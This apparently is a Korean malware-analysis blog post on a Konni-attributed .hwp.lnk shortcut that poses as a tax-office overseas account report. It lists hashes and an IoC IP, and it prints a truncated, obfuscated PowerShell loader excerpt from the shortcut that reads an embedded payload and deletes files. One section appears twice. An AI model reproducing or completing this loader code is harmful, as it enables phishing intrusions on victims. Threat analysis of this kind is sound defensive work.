국세청 사칭 북한 코니(Konni) 에서 제작한 해외금융계좌 신고서.hwp.lnk(2025.7.25)
Contents
오늘은 북한 해킹 단체인 코니(Konni) 에서 제작한 해외금융계좌 신고서.hwp.lnk에 대해서 알아보겠습니다. 해당 악성코드는 기본적으로 제목으로 보시다시피 해외금융계좌 신고서로 위장하고 있으며 무작위로 이메일을 뿌려서 하나 걸리라는 식으로 악성코드를 운영하는 것이 아닐까 생각이 됩니다. 해당 부분을 국세청 사칭을 하는 공격 방식을 취하고 있습니다.
해외금융계좌 신고서 는 간단하게 납세자가 해외에 보유하는 금융계좌 정보를 국세청에 신고하도록 의무를 부과하는 제도 즉 역외 탈세를 방지하고 국내 자산의 해외 유출을 막아 세원 기반을 확대하기 위한 목적입니다.
해쉬
파일명:해외금융계좌 신고서.hwp.lnk
사이즈: 1 MB
MD5:8b8fa6c4298d83d78e11b52f22a79100
SHA-1:33057c8c7f277e89872239907792f6f2319713d4
SHA-256:8d9d5a21d75e14410cc30e15176ecae45d17221c654ccdb94d99d131c14de6e9
이며 일단 기본적으로 해당 악성코드를 내부를 보면 기본적으로 언제나 윈도우 Powershell 기능을 악용하는 것을 확인할 수가 있습니다.
악성코드 Powershell
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPower(s)hell\*.
e(x)e ^| findstr /i rshe(l)l(.)exe') do (if exist "%f" (%f "function neces(s)ary{par
am($big); <#her v(i)rus#>$quit = $big.subs(t)ring(0,$big.length-4) + ''; <#seriously
lost#>return $quit;};function root{param($guilty); rem''(o')'ve''-i''t''em $guilty -
Force;};function use(f)ul{param($appeal,$selection,$eliminate,$of,$spot);<#communica
te around#> $nurse=N''ew''-(O)(b)''jec''t System.IO(.)FileStream(<#assign fi(n)ance#
$appeal,<#above independent#>[System.IO.FileMode]::Open,<#research enemy#>[System(.)I
O(.)FileAccess]::Read);<#earn represent#> $nurse.Seek(<#engineering discovery#>$selec
tion,[System.IO.SeekOrigin]::Begin);<#become reveal#> $frequently=$eliminate*0?01;<#f
avorite refugee#> $literature=Ne''w-''O?j''e''ct byte[] <#share league#>$eliminate; <
#convert growing#> $difficult=New''-O''bj''ect byte[] <#gender scene#>$frequently; <#
ancient …
해외금융계좌 신고서 는 간단하게 납세자가 해외에 보유하는 금융계좌 정보를 국세청에 신고하도록 의무를 부과하는 제도 즉 역외 탈세를 방지하고 국내 자산의 해외 유출을 막아 세원 기반을 확대하기 위한 목적입니다.
해쉬
파일명:해외금융계좌 신고서.hwp.lnk
사이즈: 1 MB
MD5:8b8fa6c4298d83d78e11b52f22a79100
SHA-1:33057c8c7f277e89872239907792f6f2319713d4
SHA-256:8d9d5a21d75e14410cc30e15176ecae45d17221c654ccdb94d99d131c14de6e9
이며 일단 기본적으로 해당 악성코드를 내부를 보면 기본적으로 언제나 윈도우 Powershell 기능을 악용하는 것을 확인할 수가 있습니다.
악성코드 Powershell
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPower(s)hell\*.
e(x)e ^| findstr /i rshe(l)l(.)exe') do (if exist "%f" (%f "function neces(s)ary{par
am($big); <#her v(i)rus#>$quit = $big.subs(t)ring(0,$big.length-4) + ''; <#seriously
lost#>return $quit;};function root{param($guilty); rem''(o')'ve''-i''t''em $guilty -
Force;};function use(f)ul{param($appeal,$selection,$eliminate,$of,$spot);<#communica
te around#> $nurse=N''ew''-(O)(b)''jec''t System.IO(.)FileStream(<#assign fi(n)ance#
$appeal,<#above independent#>[System.IO.FileMode]::Open,<#research enemy#>[System(.)I
O(.)FileAccess]::Read);<#earn represent#> $nurse.Seek(<#engineering discovery#>$selec
tion,[System.IO.SeekOrigin]::Begin);<#become reveal#> $frequently=$eliminate*0?01;<#f
avorite refugee#> $literature=Ne''w-''O?j''e''ct byte[] <#share league#>$eliminate; <
#convert growing#> $difficult=New''-O''bj''ect byte[] <#gender scene#>$frequently; <#
ancient …
IoC
217.60.37.55
33057c8c7f277e89872239907792f6f2319713d4
8d9d5a21d75e14410cc30e15176ecae45d17221c654ccdb94d99d131c14de6e9
8b8fa6c4298d83d78e11b52f22a79100
33057c8c7f277e89872239907792f6f2319713d4
8d9d5a21d75e14410cc30e15176ecae45d17221c654ccdb94d99d131c14de6e9
8b8fa6c4298d83d78e11b52f22a79100